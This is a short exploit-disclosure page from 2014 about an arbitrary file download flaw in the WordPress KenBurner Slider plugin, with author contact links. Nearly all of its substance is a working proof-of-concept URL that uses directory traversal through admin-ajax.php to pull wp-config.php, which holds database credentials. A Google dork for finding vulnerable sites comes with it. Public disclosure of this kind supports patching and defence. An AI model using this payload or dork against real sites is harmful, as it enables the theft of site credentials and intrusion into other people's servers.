Home / exploitsPDF  

WordPress KenBurner Slider Arbitrary File Download

Posted on 26 August 2014

# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability # Google Dork: Index of /wp-content/plugins/kbslider # Date: 2014-08-21 # Exploit Author: MF0x and Daniel Pentest # Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 # Version: All # Tested on: Windows 7 / Google Chrome Description: The Wordpress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability Proof of Concept (PoC): http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php # Discovered by: MF0x and Daniel Pentest # Website: http://www.null-source.blogspot.com.br/ # Email: daniel@analistadesistema.net # Twitter: https://twitter.com/danielpentest # YouTube: https://www.youtube.com/danielpentest # GitHub: https://github.com/danielpentest # Twitter: https://twitter.com/danielpentest # Pastebin: http://pastebin.com/u/MF0x_

 

TOP